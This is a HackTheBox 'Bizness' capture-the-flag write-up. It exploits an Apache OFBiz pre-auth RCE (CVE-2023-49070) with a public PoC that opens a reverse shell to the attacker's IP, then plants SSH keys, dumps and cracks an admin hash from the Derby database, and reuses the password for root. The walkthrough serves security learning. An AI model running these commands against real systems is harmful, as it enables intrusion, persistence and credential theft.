# Bizness - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img src="images/0.png"></div>

Bizness is a challenging easy-rated HTB machine created by [C4rm3l0](https://app.hackthebox.com/users/458049)

The user involves a Pre-auth RCE in Apache OFBiz.  
Then, we extract hashes from a Derby database used by OFBiz and review some code to determine the hash type.  
The password obtained after cracking the hash is reused for root.

## Initial recon

```console
opcode@debian$ nmap -v -p- --min-rate 2000 10.10.11.252
Nmap scan report for 10.10.11.252
Host is up (0.21s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
42871/tcp open  unknown
```

```console
opcode@debian$ nmap -sC -sV -p 22,80,443,42871 -oN bizness.nmap 10.10.11.252
map scan report for 10.10.11.252
Host is up (0.32s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 3e21d5dc2e61eb8fa63b242ab71c05d3 (RSA)
|   256 3911423f0c250008d72f1b51e0439d85 (ECDSA)
|_  256 b06fa00a9edfb17a497886b23540ec95 (ED25519)
80/tcp    open  http       nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
443/tcp   open  ssl/http   nginx 1.18.0
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after:  2328-11-10T20:03:40
| tls-nextprotoneg: 
|_  http/1.1
| tls-alpn: 
|_  http/1.1
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_ssl-date: TLS randomness does not represent time
42871/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

The ports 22 (SSH), 80 (HTTP), 443 (HTTPS) and 42871 are open.  
Both HTTP and HTTPS ports redirect to bizness.htb  
Therefore, update `/etc/hosts`:

```text
10.10.11.252 bizness.htb
```

## Pre-auth RCE in Apache OFBiz

<http://bizness.htb/> redirects to <https://bizness.htb/>, whose footer mentions that Apache OFBiz powers the website:

![1](images/1.png)

Apache OFBiz is an open-source enterprise resource planning system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.

An exploit for OFBiz, CVE-2023-51467, was in the news at the time of box release: <https://blog.sonicwall.com/en-us/2023/12/sonicwall-discovers-critical-apache-ofbiz-zero-day-authbiz/>  
However, CVE-2023-51467 was disclosed on December 26th, 2023, and the HTB box came out on January 6th.  
It is unlikely to be the intended vulnerability. The SonicWall blog mentions that CVE-2023-51467 was discovered while researching the root cause for the previously disclosed vulnerability CVE-2023-49070.  
Therefore, CVE-2023-49070 is more likely to be the intended route. It refers to a pre-auth RCE in Apache OFBiz 18.12.09 due to XML-RPC being no longer maintained, yet still present.

I used the PoC from <https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC>  
This PoC requires `openjdk-11-jre` but I'm on Debian 12 "Bookworm" and OpenJDK-11 has been removed from stable packages. We need to add the unstable repository to `sources.list` and pin it down.

```console
opcode@debian$ sudo apt remove openjdk-17-jre
opcode@debian$ sudo apt autoremove
opcode@debian$ sudo nano /etc/apt/sources.list
```

(Removing `openjdk-17-jre` is optional; read further to learn how to manage multiple versions)
At the bottom of the list, add the following line:

```text
deb http://deb.debian.org/debian/ unstable main contrib non-free
```

Create a preferences file to pin the unstable repository to a lower priority:

```console
opcode@debian$ sudo nano /etc/apt/preferences.d/unstable-pin
```

Change its contents to:

```text
Package: openjdk-11-*
Pin: release a=unstable
Pin-Priority: 50
```

Now, we can install OpenJDK-11:

```console
opcode@debian$ sudo apt update
opcode@debian$ sudo apt install openjdk-11-jre/unstable
```

We also need to set it to default in case another version is present:

```console
opcode@debian$ sudo update-java-alternatives --list
java-1.11.0-openjdk-amd64      1111       /usr/lib/jvm/java-1.11.0-openjdk-amd64
opcode@debian$ sudo update-java-alternatives --jre --set java-1.11.0-openjdk-amd64
```

Now, the exploit can be used to obtain a shell:

```console
opcode@debian$ wget https://raw.githubusercontent.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC/main/exploit.py
opcode@debian$ wget https://github.com/frohoff/ysoserial/releases/latest/download/ysoserial-all.jar
opcode@debian$ python3 exploit.py https://bizness.htb/ shell 10.10.14.83:9001
```

I received a shell as user `ofbiz`:

```console
ofbiz@bizness:/opt/ofbiz$ id
uid=1001(ofbiz) gid=1001(ofbiz-operator) groups=1001(ofbiz-operator)
```

To upgrade the shell, we can generate SSH keys:

```console
ofbiz@bizness:~$ ssh-keygen -t ecdsa -N ''
ofbiz@bizness:~$ mv ~/.ssh/id_ecdsa.pub ~/.ssh/authorized_keys
```

The `id_ecdsa` can be used for SSH:

```console
opcode@debian$ chmod 600 id_ecdsa
opcode@debian$ ssh -i id_ecdsa ofbiz@bizness.htb
```

## Derby database

I ran `linpeas.sh`, and it strongly points out `ofbiz.service`:

```text
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
/etc/systemd/system/multi-user.target.wants/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
/etc/systemd/system/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
/etc/systemd/system/ofbiz.service is calling this writable executable: /opt/ofbiz/gradlew
You can't write on systemd PATH
```

Going down this route, overwriting `/opt/ofbiz/gradlew` with a reverse shell binary results in another shell as the same user, `ofbiz`. It is not useful.

I transferred [miniss](https://github.com/noraj/miniss) to the box and ran it:

```console
ofbiz@bizness:~$ ./miniss 
type local address         remote address     state       username (uid)
tcp  0.0.0.0:80            0.0.0.0:0          LISTEN      root (0)
tcp  0.0.0.0:22            0.0.0.0:0          LISTEN      root (0)
tcp  0.0.0.0:443           0.0.0.0:0          LISTEN      root (0)
tcp  10.10.11.252:22      10.10.14.83:35766 ESTABLISHED root (0)
tcp  [::]:36645            [::]:0             LISTEN      ofbiz (1001)
tcp  [::ffff:7f00:1]:8009  [::]:0             LISTEN      ofbiz (1001)
tcp  [::ffff:7f00:1]:8080  [::]:0             LISTEN      ofbiz (1001)
tcp  [::]:80               [::]:0             LISTEN      root (0)
tcp  [::]:22               [::]:0             LISTEN      root (0)
tcp  [::ffff:7f00:1]:8443  [::]:0             LISTEN      ofbiz (1001)
tcp  [::ffff:7f00:1]:10523 [::]:0             LISTEN      ofbiz (1001)
tcp  [::]:443              [::]:0             LISTEN      root (0)
tcp  [::1]:57428           [::1]:36645        ESTABLISHED ofbiz (1001)
tcp  [::1]:36645           [::1]:57428        ESTABLISHED ofbiz (1001)
udp  10.10.11.252:56874   1.1.1.1:53         ESTABLISHED systemd-timesync (104)
udp  0.0.0.0:68            0.0.0.0:0          CLOSE       root (0)
udp  [::]:44691            [::]:0             CLOSE       ofbiz (1001)
udp  [::]:57769            [::]:0             CLOSE       ofbiz (1001)
```

OFBiz backend supports user authentication; it must use a database, but none of the standard database ports are being used.  
In the [documentation](<https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide>) we'd learn that by default, OFBiz includes and is configured for an embedded Java database called Derby.

```console
ofbiz@bizness:/opt/ofbiz/runtime/data/derby$ ls
derby.log  ofbiz  ofbizolap  ofbiztenant
```

Furthermore, I learnt about the Derby `ij` tool, a JDBC tool you can use to run scripts or interactive queries against a Derby database.  
After a bunch of googling, I learnt that it comes packed with derby download. I downloaded and transferred it to the box:

```console
opcode@parrot$ wget https://archive.apache.org/dist/db/derby/db-derby-10.15.2.0/db-derby-10.15.2.0-bin.zip
opcode@parrot$ scp -i ~/id_ecdsa db-derby-10.15.2.0-bin.zip ofbiz@bizness.htb:/dev/shm/db-derby-10.15.2.0-bin.zip
```

Once transferred, we can run:

```console
ofbiz@bizness:/dev/shm$ unzip db-derby-10.15.2.0-bin.zip 
ofbiz@bizness:/dev/shm$ java -jar db-derby-10.15.2.0-bin/lib/derbyrun.jar ij
ij version 10.15
ij> connect 'jdbc:derby:/opt/ofbiz/runtime/data/derby/ofbiz';
ERROR XJ040: Failed to start database '/opt/ofbiz/runtime/data/derby/ofbiz' with class loader jdk.internal.loader.ClassLoaders$AppClassLoader@55054057, see the next exception for details.
ERROR XSDB6: Another instance of Derby may have already booted the database /opt/ofbiz/runtime/data/derby/ofbiz.
```

That didn't work. I tried `dblook`, and it logged the same error.  
It is a case of database lock acquisition failure. I could not find a workaround and had to take drastic measures i.e., stop the service entirely:

```console
ofbiz@bizness:/opt/ofbiz$ ./gradlew "ofbiz --shutdown"
```

After that, I was able to connect to the database:

```console
ofbiz@bizness:/dev/shm$ java -jar db-derby-10.15.2.0-bin/lib/derbyrun.jar ij
ij version 10.15
ij> connect 'jdbc:derby:/opt/ofbiz/runtime/data/derby/ofbiz';
ij> show tables;
TABLE_SCHEM         |TABLE_NAME                    |REMARKS             
------------------------------------------------------------------------
SYS                 |SYSALIASES                    |                    
SYS                 |SYSCHECKS                     |                    
SYS                 |SYSCOLPERMS                   |                    
[--SNIP--]
OFBIZ               |USER_LOGIN                    |                    
OFBIZ               |USER_LOGIN_HISTORY            |                    
OFBIZ               |USER_LOGIN_PASSWORD_HISTORY   |                    
OFBIZ               |USER_LOGIN_SECURITY_GROUP     |                    
OFBIZ               |USER_LOGIN_SECURITY_QUESTION  |                    
OFBIZ               |USER_LOGIN_SESSION            |                    
[--SNIP--]
```

`USER_LOGIN` contains a password hash:

```console
ij> set schema OFBIZ;
ij> select * from USER_LOGIN;
USER_LOGIN_ID | CURRENT_PASSWORD                    | PASSWORD_HINT | IS_ | ENA | HAS | REQ | LAST_CURRENCY_UOM | LAST_LOCA& | LAST_TIME_ZONE | DISABLED_DATE_TIME  | SUCCESSIVE_FAILED_LO& | EXTERNAL_AUTH_ID | USER_LDAP_DN | DISABLED_BY | LAST_UPDATED_STAMP          | LAST_UPDATED_TX_STAMP       | CREATED_STAMP               |
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
system        | NULL                                | NULL           | Y    | N   | NULL| NULL| NULL              | NULL       | NULL           | NULL              | NULL                   | NULL             | NULL         | NULL        | 2023-12-16 03:39:04.584    | 2023-12-16 03:39:04.538    | 2023-12-16 03:38:54.694      |
anonymous     | NULL                                | NULL           | NULL | N   | NULL| NULL| NULL              | NULL       | NULL           | NULL              | NULL                   | NULL             | NULL         | NULL        | 2023-12-16 03:38:54.747    | 2023-12-16 03:38:54.284    | 2023-12-16 03:38:54.747      |
admin         | $SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I  | NULL           | NULL | Y   | N   | N   | NULL              | NULL       | NULL           | NULL              | NULL                   | NULL             | NULL         | NULL        | 2023-12-16 03:44:54.272    | 2023-12-16 03:44:54.213    | 2023-12-16 03:40:23.643      |

ij> disconnect;
ij> exit;
```

For the user `admin`, a weird hash is present:

```text
$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I
```

## Source code analysis to find hash type

We need to dive into OFBiz source code to determine the type of hashing function used.  
The authentication logic is handled in <https://github.com/msc/ofbiz/blob/master/apache-ofbiz-10.04.03/hot-deploy/osafe/src/com/osafe/services/LoginServices.java#L69>  
After that, you can find the declarations for all the hashing functions in <https://github.com/apache/ofbiz/blob/trunk/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java>

Although I did not parse the code in its entirety, I followed through the lines where `hashType` was `null` or `SHA` and other relevant parts.  
Some of the deductions I made:

- the salt is simply "d". (It is generated in a manner such that salts can have lengths between 1 and 15)
- [MessageDigest](https://docs.oracle.com/javase/8/docs/api/java/security/MessageDigest.html) is used. I did not find `SHA` in <https://docs.oracle.com/javase/8/docs/technotes/guides/security/StandardNames.html#MessageDigest>, so we need to test for algorithms `SHA-1`, `SHA-256`, and so on.
- the hash in database is base64 encoded with the URL-safe variant, but replaces `+` with `.`
- unlike the usual approach where `sha1($password.$salt)` is calculated, `getCryptedBytes` here calculates `sha1($salt.$password)`

Assuming the hash format to be `SHA-1`, for John the ripper, the equivalent hash format is:

```text
admin:$dynamic_25$b8fd3f41a541a435857a8f3e751cc3a91c174362$d
```

We can attempt to crack it with `john`:

```console
opcode@debian$ john/john --wordlist=/home/opcode/CTF/wordlists/rockyou.txt hash
```

It immediately cracks to `monkeybizness`  
This password has been reused for root:

```console
ofbiz@bizness:~$ su -
Password: 
root@bizness:~# id
uid=0(root) gid=0(root) groups=0(root)
```
